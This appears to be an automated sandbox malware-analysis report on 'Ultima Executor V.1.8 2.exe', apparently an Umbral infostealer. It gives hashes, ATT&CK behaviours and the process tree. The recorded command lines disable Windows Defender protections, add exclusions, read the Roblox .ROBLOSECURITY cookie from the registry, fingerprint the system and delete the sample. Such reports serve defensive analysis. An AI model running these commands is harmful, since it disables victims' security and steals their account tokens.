Analysis
-
max time kernel
104s -
max time network
118s -
platform
windows10-2004_x64 -
resource
win10v2004-20250314-en -
resource tags
arch:x64arch:x86image:win10v2004-20250314-enlocale:en-usos:windows10-2004-x64system -
submitted
15/04/2025, 02:03
Static task
static1
General
-
Target
Ultima Executor V.1.8 2.exe
-
Size
911KB
-
MD5
c1d3eba922b1c8200c576741321e30f0
-
SHA1
992b40e1883a7f034b99256084aa0130d738ba5c
-
SHA256
2257c78940e11aab5b71fd84da526e53a7d86c217667b42bc29f837e8ea09eb7
-
SHA512
cbebcc57d691cb0a42ea345aa296e6e7ca52ad09e049e1e951f56415dd657ebbe69a7ed8e0ed41cdea40e7c82d579579457af9374cbcf718fa9bf0c6a777c224
-
SSDEEP
24576:PX0dNTiM8RviVUwblP373RVTdQJtg8y6E:/0dNTiM8NiVUC373RheE
Malware Config
Signatures
-
Detect Umbral payload 1 IoCs
resource yara_rule behavioral1/memory/1872-3-0x0000000000400000-0x0000000000440000-memory.dmp family_umbral -
Umbral family
-
Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 4460 powershell.exe 5904 powershell.exe 2256 powershell.exe 1624 powershell.exe -
Drops file in Drivers directory 1 IoCs
description ioc Process File opened for modification C:\Windows\System32\drivers\etc\hosts Ultima Executor V.1.8 2.exe -
Executes dropped EXE 1 IoCs
pid Process 1872 Ultima Executor V.1.8 2.exe -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 30 discord.com 31 discord.com -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 26 ip-api.com -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 3672 set thread context of 1872 3672 Ultima Executor V.1.8 2.exe 96 -
System Location Discovery: System Language Discovery 1 TTPs 15 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language attrib.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wmic.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wmic.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Ultima Executor V.1.8 2.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wmic.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wmic.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Ultima Executor V.1.8 2.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wmic.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language PING.EXE -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs
Adversaries may check for Internet connectivity on compromised systems.
pid Process 5812 cmd.exe 3600 PING.EXE -
Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.
pid Process 1096 wmic.exe -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 3600 PING.EXE -
Suspicious behavior: EnumeratesProcesses 11 IoCs
pid Process 1872 Ultima Executor V.1.8 2.exe 4460 powershell.exe 4460 powershell.exe 5904 powershell.exe 5904 powershell.exe 2256 powershell.exe 2256 powershell.exe 4696 powershell.exe 4696 powershell.exe 1624 powershell.exe 1624 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 3672 Ultima Executor V.1.8 2.exe Token: SeDebugPrivilege 1872 Ultima Executor V.1.8 2.exe Token: SeIncreaseQuotaPrivilege 4992 wmic.exe Token: SeSecurityPrivilege 4992 wmic.exe Token: SeTakeOwnershipPrivilege 4992 wmic.exe Token: SeLoadDriverPrivilege 4992 wmic.exe Token: SeSystemProfilePrivilege 4992 wmic.exe Token: SeSystemtimePrivilege 4992 wmic.exe Token: SeProfSingleProcessPrivilege 4992 wmic.exe Token: SeIncBasePriorityPrivilege 4992 wmic.exe Token: SeCreatePagefilePrivilege 4992 wmic.exe Token: SeBackupPrivilege 4992 wmic.exe Token: SeRestorePrivilege 4992 wmic.exe Token: SeShutdownPrivilege 4992 wmic.exe Token: SeDebugPrivilege 4992 wmic.exe Token: SeSystemEnvironmentPrivilege 4992 wmic.exe Token: SeRemoteShutdownPrivilege 4992 wmic.exe Token: SeUndockPrivilege 4992 wmic.exe Token: SeManageVolumePrivilege 4992 wmic.exe Token: 33 4992 wmic.exe Token: 34 4992 wmic.exe Token: 35 4992 wmic.exe Token: 36 4992 wmic.exe Token: SeIncreaseQuotaPrivilege 4992 wmic.exe Token: SeSecurityPrivilege 4992 wmic.exe Token: SeTakeOwnershipPrivilege 4992 wmic.exe Token: SeLoadDriverPrivilege 4992 wmic.exe Token: SeSystemProfilePrivilege 4992 wmic.exe Token: SeSystemtimePrivilege 4992 wmic.exe Token: SeProfSingleProcessPrivilege 4992 wmic.exe Token: SeIncBasePriorityPrivilege 4992 wmic.exe Token: SeCreatePagefilePrivilege 4992 wmic.exe Token: SeBackupPrivilege 4992 wmic.exe Token: SeRestorePrivilege 4992 wmic.exe Token: SeShutdownPrivilege 4992 wmic.exe Token: SeDebugPrivilege 4992 wmic.exe Token: SeSystemEnvironmentPrivilege 4992 wmic.exe Token: SeRemoteShutdownPrivilege 4992 wmic.exe Token: SeUndockPrivilege 4992 wmic.exe Token: SeManageVolumePrivilege 4992 wmic.exe Token: 33 4992 wmic.exe Token: 34 4992 wmic.exe Token: 35 4992 wmic.exe Token: 36 4992 wmic.exe Token: SeDebugPrivilege 4460 powershell.exe Token: SeDebugPrivilege 5904 powershell.exe Token: SeDebugPrivilege 2256 powershell.exe Token: SeDebugPrivilege 4696 powershell.exe Token: SeIncreaseQuotaPrivilege 6124 wmic.exe Token: SeSecurityPrivilege 6124 wmic.exe Token: SeTakeOwnershipPrivilege 6124 wmic.exe Token: SeLoadDriverPrivilege 6124 wmic.exe Token: SeSystemProfilePrivilege 6124 wmic.exe Token: SeSystemtimePrivilege 6124 wmic.exe Token: SeProfSingleProcessPrivilege 6124 wmic.exe Token: SeIncBasePriorityPrivilege 6124 wmic.exe Token: SeCreatePagefilePrivilege 6124 wmic.exe Token: SeBackupPrivilege 6124 wmic.exe Token: SeRestorePrivilege 6124 wmic.exe Token: SeShutdownPrivilege 6124 wmic.exe Token: SeDebugPrivilege 6124 wmic.exe Token: SeSystemEnvironmentPrivilege 6124 wmic.exe Token: SeRemoteShutdownPrivilege 6124 wmic.exe Token: SeUndockPrivilege 6124 wmic.exe -
Suspicious use of WriteProcessMemory 47 IoCs
description pid Process procid_target PID 3672 wrote to memory of 1872 3672 Ultima Executor V.1.8 2.exe 96 PID 3672 wrote to memory of 1872 3672 Ultima Executor V.1.8 2.exe 96 PID 3672 wrote to memory of 1872 3672 Ultima Executor V.1.8 2.exe 96 PID 3672 wrote to memory of 1872 3672 Ultima Executor V.1.8 2.exe 96 PID 3672 wrote to memory of 1872 3672 Ultima Executor V.1.8 2.exe 96 PID 3672 wrote to memory of 1872 3672 Ultima Executor V.1.8 2.exe 96 PID 3672 wrote to memory of 1872 3672 Ultima Executor V.1.8 2.exe 96 PID 3672 wrote to memory of 1872 3672 Ultima Executor V.1.8 2.exe 96 PID 1872 wrote to memory of 4992 1872 Ultima Executor V.1.8 2.exe 97 PID 1872 wrote to memory of 4992 1872 Ultima Executor V.1.8 2.exe 97 PID 1872 wrote to memory of 4992 1872 Ultima Executor V.1.8 2.exe 97 PID 1872 wrote to memory of 4932 1872 Ultima Executor V.1.8 2.exe 99 PID 1872 wrote to memory of 4932 1872 Ultima Executor V.1.8 2.exe 99 PID 1872 wrote to memory of 4932 1872 Ultima Executor V.1.8 2.exe 99 PID 1872 wrote to memory of 4460 1872 Ultima Executor V.1.8 2.exe 101 PID 1872 wrote to memory of 4460 1872 Ultima Executor V.1.8 2.exe 101 PID 1872 wrote to memory of 4460 1872 Ultima Executor V.1.8 2.exe 101 PID 1872 wrote to memory of 5904 1872 Ultima Executor V.1.8 2.exe 103 PID 1872 wrote to memory of 5904 1872 Ultima Executor V.1.8 2.exe 103 PID 1872 wrote to memory of 5904 1872 Ultima Executor V.1.8 2.exe 103 PID 1872 wrote to memory of 2256 1872 Ultima Executor V.1.8 2.exe 105 PID 1872 wrote to memory of 2256 1872 Ultima Executor V.1.8 2.exe 105 PID 1872 wrote to memory of 2256 1872 Ultima Executor V.1.8 2.exe 105 PID 1872 wrote to memory of 4696 1872 Ultima Executor V.1.8 2.exe 107 PID 1872 wrote to memory of 4696 1872 Ultima Executor V.1.8 2.exe 107 PID 1872 wrote to memory of 4696 1872 Ultima Executor V.1.8 2.exe 107 PID 1872 wrote to memory of 6124 1872 Ultima Executor V.1.8 2.exe 109 PID 1872 wrote to memory of 6124 1872 Ultima Executor V.1.8 2.exe 109 PID 1872 wrote to memory of 6124 1872 Ultima Executor V.1.8 2.exe 109 PID 1872 wrote to memory of 1960 1872 Ultima Executor V.1.8 2.exe 111 PID 1872 wrote to memory of 1960 1872 Ultima Executor V.1.8 2.exe 111 PID 1872 wrote to memory of 1960 1872 Ultima Executor V.1.8 2.exe 111 PID 1872 wrote to memory of 3408 1872 Ultima Executor V.1.8 2.exe 113 PID 1872 wrote to memory of 3408 1872 Ultima Executor V.1.8 2.exe 113 PID 1872 wrote to memory of 3408 1872 Ultima Executor V.1.8 2.exe 113 PID 1872 wrote to memory of 1624 1872 Ultima Executor V.1.8 2.exe 115 PID 1872 wrote to memory of 1624 1872 Ultima Executor V.1.8 2.exe 115 PID 1872 wrote to memory of 1624 1872 Ultima Executor V.1.8 2.exe 115 PID 1872 wrote to memory of 1096 1872 Ultima Executor V.1.8 2.exe 117 PID 1872 wrote to memory of 1096 1872 Ultima Executor V.1.8 2.exe 117 PID 1872 wrote to memory of 1096 1872 Ultima Executor V.1.8 2.exe 117 PID 1872 wrote to memory of 5812 1872 Ultima Executor V.1.8 2.exe 120 PID 1872 wrote to memory of 5812 1872 Ultima Executor V.1.8 2.exe 120 PID 1872 wrote to memory of 5812 1872 Ultima Executor V.1.8 2.exe 120 PID 5812 wrote to memory of 3600 5812 cmd.exe 122 PID 5812 wrote to memory of 3600 5812 cmd.exe 122 PID 5812 wrote to memory of 3600 5812 cmd.exe 122 -
Views/modifies file attributes 1 TTPs 1 IoCs
pid Process 4932 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\Ultima Executor V.1.8 2.exe"C:\Users\Admin\AppData\Local\Temp\Ultima Executor V.1.8 2.exe"1⤵
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3672 -
C:\Users\Admin\AppData\Local\Temp\Ultima Executor V.1.8 2.exe"C:\Users\Admin\AppData\Local\Temp\Ultima Executor V.1.8 2.exe"2⤵
- Drops file in Drivers directory
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1872 -
C:\Windows\SysWOW64\Wbem\wmic.exe"wmic.exe" csproduct get uuid3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:4992
-
-
C:\Windows\SysWOW64\attrib.exe"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Ultima Executor V.1.8 2.exe"3⤵
- System Location Discovery: System Language Discovery
- Views/modifies file attributes
PID:4932
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Ultima Executor V.1.8 2.exe'3⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4460
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 23⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5904
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY3⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2256
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY3⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4696
-
-
C:\Windows\SysWOW64\Wbem\wmic.exe"wmic.exe" os get Caption3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:6124
-
-
C:\Windows\SysWOW64\Wbem\wmic.exe"wmic.exe" computersystem get totalphysicalmemory3⤵
- System Location Discovery: System Language Discovery
PID:1960
-
-
C:\Windows\SysWOW64\Wbem\wmic.exe"wmic.exe" csproduct get uuid3⤵
- System Location Discovery: System Language Discovery
PID:3408
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER3⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:1624
-
-
C:\Windows\SysWOW64\Wbem\wmic.exe"wmic" path win32_VideoController get name3⤵
- System Location Discovery: System Language Discovery
- Detects videocard installed
PID:1096
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Ultima Executor V.1.8 2.exe" && pause3⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Suspicious use of WriteProcessMemory
PID:5812 -
C:\Windows\SysWOW64\PING.EXEping localhost4⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:3600
-
-
-
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵PID:6108
Network
MITRE ATT&CK Enterprise v16
Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Unsecured Credentials
1Credentials In Files
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
425B
MD54eaca4566b22b01cd3bc115b9b0b2196
SHA1e743e0792c19f71740416e7b3c061d9f1336bf94
SHA25634ba0ab8d1850e7825763f413142a333ccbc05fa2b5499a28a7d27b8a1c5b4bb
SHA512bc2b1bf45203e3bb3009a7d37617b8f0f7ffa613680b32de2b963e39d2cf1650614d7035a0cf78f35a4f5cb17a2a439e2e07deaefd2a4275a62efd0a5c0184a1
-
Filesize
2KB
MD5968cb9309758126772781b83adb8a28f
SHA18da30e71accf186b2ba11da1797cf67f8f78b47c
SHA25692099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a
SHA5124bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3
-
Filesize
18KB
MD57c260517bfa3a5bf6aed88ef7f15d670
SHA103fe3a792297bbdc4d9413b487f8b19978afae61
SHA256bab86efb87ae5c6deec8f4af8b0d2b2fa4aadd8254e522b35022fdee9778f8f3
SHA512458ab89a6c694f5cc448fdec646fbd75836a7f5a85aa41b907a673a1fe5393736db3808410a8dec59d9cb7a9c1e4ef26f61e4ef39be4122b06d921032e5da892
-
Filesize
17KB
MD52d610892846b56177ca4072aeed9e8d2
SHA118110166698a80d3fbd141bc33bd5acb10bf2005
SHA25611cec2158f84f25e457ff1b5b67784894890d4cd2453c97d0e2d33b0bb46a7e7
SHA512d58ae0ce6f28e50c7b7c348d8360cc715be0306d08c3c6e6b378266e48574fceab0b1c34962c229e7dd8d529d14b8fab814f130f43798377cbaf5e0e85b120e3
-
Filesize
18KB
MD590020815b41e4d530588e5eb5d604416
SHA1cf04a6d90cf51b34fce20aefc003151c48a50870
SHA256cce667b77557bd34f7c22c29a77b0deec1c19a76798457369f0b5ed95bbd5e6e
SHA512c0e2b9f3f2f984303c136e0ce624fe79b68c6f72a33001ca5c1c12db97d79cf61118670286ed73daaafd10a2bac2b75aa5cb9b3204e61b2541a8d9bda7fed9eb
-
Filesize
15KB
MD5dde322a46f9517e7f9dfb6d045e6cae2
SHA1f5a5a83b7ee3262374c00d1deadd011c273b46ad
SHA256b97be31b3d9f24ad3ad6ca6139d9f784554a850b91000447a34f7f86c826fdc7
SHA512a226755cd8f42e0d8158d67f95d640d58d9e4e4963391f6d26c653045ef40d3a5fdd620b5085c63eb58951ad065f9c268fec31fb08f69176a9da3bf77829a3e4
-
Filesize
911KB
MD5c1d3eba922b1c8200c576741321e30f0
SHA1992b40e1883a7f034b99256084aa0130d738ba5c
SHA2562257c78940e11aab5b71fd84da526e53a7d86c217667b42bc29f837e8ea09eb7
SHA512cbebcc57d691cb0a42ea345aa296e6e7ca52ad09e049e1e951f56415dd657ebbe69a7ed8e0ed41cdea40e7c82d579579457af9374cbcf718fa9bf0c6a777c224
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82